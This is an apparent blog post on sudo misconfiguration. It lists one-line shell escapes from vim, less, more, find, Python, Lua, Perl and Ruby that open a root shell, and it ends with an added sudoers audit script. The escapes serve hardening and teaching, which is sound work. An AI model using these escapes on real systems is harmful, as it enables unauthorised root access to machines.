Sudon’t escape so easily!

How poor sudo configuration leads to simple full root access.

** I’ve added some ninja edits halfway down to clarify some things **

I was considering writing this as a part three to blue team fundamentals but I’ve decided it doesn’t quite fit the criteria. It falls more into the server hardening/gold build/secure lifecycles, which Leigh has written about in 5 parts starting here (and it’s well worth a read).

So let’s talk about ‘sudo’. If you don’t know what it is, simply put, it allows a user with limited privileges to perform specific tasks with a higher level of privilege, normally as root. If you’ve not got there yet, sudo is Super User DO, AKA do something as super user (these days it is often expanded as “substitute user do”, since it can run commands as any user, not just root).

Relevant XKCD — https://xkcd.com/149/

For slightly more pertinent information:

When setting up an account you can assign sudo permissions to the individual user or have them inherited from a group. How to set these up is beyond the scope of this post. You can see what you’re allowed to run with sudo with the following command:

sudo -l

On a root user the output looks like this:

root@kali:~# sudo -l

Matching Defaults entries for root on kali:

env_reset, mail_badpass,

secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin



User root may run the following commands on kali:

(ALL : ALL) ALL

So we can see as root we can run any commands, which is entirely expected.

Now how about a new user? Let’s create one and test.

root@kali:~# useradd basic -s /bin/bash -m

root@kali:/home/basic# passwd basic

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

root@kali:~# su basic

basic@kali:/root$ whoami

basic

basic@kali:/root$ cd ~

basic@kali:~$ pwd

/home/basic

basic@kali:~$ sudo -l We trust you have received the usual lecture from the local System

Administrator. It usually boils down to these three things:



#1) Respect the privacy of others.

#2) Think before you type.

#3) With great power comes great responsibility.



[sudo] password for basic:

Sorry, user basic may not run sudo on kali.

Okay, so no permissions. Dropping back into a root shell and running ‘visudo’, I duplicate the root entry for basic. Don’t do this in production; it is effectively the same as granting root (well, not quite, but that’s not part of this post).

The power!

****************************************************************

EDIT TEXT: I’ve been made aware there is some confusion from some quarters that:

Although it’s possibly (probably) meant as sarcasm, it does imply a fair point about clarity of what is going on here. I have used ALL in lieu of adding each of the individual programs. It was a blunt instrument to prove a point, because I was too lazy to do a proper job of the sudoers set-up. If your sudoers file allows access to ANY of the programs below, then full root access is easily achieved. You’ve only allowed the less command? That’s a root shell. Only allowed Python? That’s a root shell. Hope this clears things up.

****************************************************************

It’s probably worth noting I could have added the user to the sudo group (the “sudoers group” on Debian-based systems such as Kali) when I created it, which would have had the same effect. In a production environment you would then lock down what that group is allowed to run via sudo. Anyway, repeating the ‘sudo -l’ command we see basic can run everything.

root@kali:/home/basic# su basic

basic@kali:~$ sudo -l

[sudo] password for basic:

Matching Defaults entries for basic on kali:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin



User basic may run the following commands on kali:

(ALL : ALL) ALL

Now for the escapes (with video demonstrations no less!). Each assumes the program is run via sudo, so the shell you drop into is root’s.

VIM

:!/bin/bash or :shell

MORE

Load a file long enough to run past one screen (or shrink the terminal to a few lines), then at the --More-- prompt:

!bash

LESS

!bash (or press v to open the file in the editor, then :shell from vim)

FIND

find . -exec bash -i \;

(this spawns one shell per match; exit it and the next one starts)

Python

>>> import os
>>> os.system('/bin/bash')

LUA

> os.execute("/bin/bash")

Perl

perl -e 'exec "/bin/bash";'

(or start perl with no script, type exec "/bin/bash"; and then Ctrl-D for EOF)

Ruby

ruby -e 'exec "/bin/bash"'

So there you go, 8 ridiculously easy ways to drop into a root shell if you’ve managed to compromise an account with sudo privileges on any of these programs. Alternatively, 8 ridiculously easy things to remove from your sudoers access to stop an attacker getting root without even having to think about it. And the list is not exhaustive: anything that can spawn a subprocess, or read and write arbitrary files as root, is as good as a root shell. If the task is editing a root-owned file, grant sudoedit on that one file rather than an editor.
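To turn the “remove these from sudoers” advice (and the earlier point about locking down what the sudo group may run) into something checkable, here is an added example that is not part of the original post: a small POSIX shell audit that reads sudoers-style text and flags every rule that hands a user or group either ALL or one of the programs listed above. The two sudoers samples inside it are constructed for the example, not taken from a real system; the parser assumes one rule per line with no line continuations, no Cmnd_Alias expansion, and the usual “user HOSTS=(RUNAS) [TAGS:] cmd, cmd” layout, which is enough for the default Debian/Kali file but not for every possible sudoers.

```shell
#!/bin/sh
# Added example (not from the original post): audit sudoers text for rules that
# hand out ALL, or a program with a known shell escape, to a user or group.
# Assumptions: one rule per line, no "\" continuations, no Cmnd_Alias expansion.

# Programs the post shows escaping to a root shell. Extend as you find more.
# Padded with spaces so membership can be tested with a parameter expansion.
ESCAPE_BINS=" vim vi more less find python python2 python3 lua perl ruby "

# Constructed sample: a weak sudoers in the spirit of the post's visudo change.
WEAK_SUDOERS='
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
basic   ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
ops     ALL=(root) NOPASSWD: /usr/bin/vim, /usr/bin/less /var/log/syslog
deploy  ALL=(root) NOPASSWD: /bin/systemctl restart app.service
'

# Constructed sample: the same operational intent without handing out a shell.
# Editing a root-owned file goes through sudoedit, log reading through journalctl.
HARDENED_SUDOERS='
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
ops     ALL=(root) sudoedit /etc/app/app.conf, /usr/bin/journalctl -u app.service
deploy  ALL=(root) NOPASSWD: /bin/systemctl restart app.service
'

# Read sudoers text on stdin and print one "user<TAB>program" line per risky rule.
# root is skipped because "(ALL : ALL) ALL" for root is the expected state.
audit_sudoers() {
    sed -e 's/#.*//' -e '/^[[:space:]]*$/d' -e '/^[[:space:]]*Defaults/d' |
    while read -r user rest; do
        [ "$user" = root ] && continue
        cmds=${rest#*=}                                  # drop the "HOSTS=" part
        cmds=$(printf '%s' "$cmds" |
               sed -e 's/^[[:space:]]*([^)]*)//' \
                   -e 's/[A-Z][A-Z]*:[[:space:]]*//g')   # drop "(runas)" and NOPASSWD:-style tags
        printf '%s\n' "$cmds" | tr ',' '\n' | while read -r cmd _args; do
            [ -z "$cmd" ] && continue
            name=${cmd##*/}                              # basename of the command
            if [ "$name" = ALL ]; then
                printf '%s\t%s\n' "$user" ALL
            elif [ "${ESCAPE_BINS#* $name }" != "$ESCAPE_BINS" ]; then
                printf '%s\t%s\n' "$user" "$name"
            fi
        done
    done
}

# Count the risky rules in a string of sudoers text (used by the checks below).
count_risky() {
    printf '%s\n' "$1" | audit_sudoers | wc -l | tr -d ' '
}

printf 'weak sudoers:\n';     printf '%s\n' "$WEAK_SUDOERS"     | audit_sudoers
printf 'hardened sudoers:\n'; printf '%s\n' "$HARDENED_SUDOERS" | audit_sudoers
```

On the weak sample the audit reports basic and %sudo for ALL, and ops twice (vim and less); on the hardened sample it reports nothing. Run it against a copy of the real file with `sudo cat /etc/sudoers | sh -c '. ./audit.sh; audit_sudoers'` or similar, and remember that /etc/sudoers.d/* and any Cmnd_Alias lines need the same treatment.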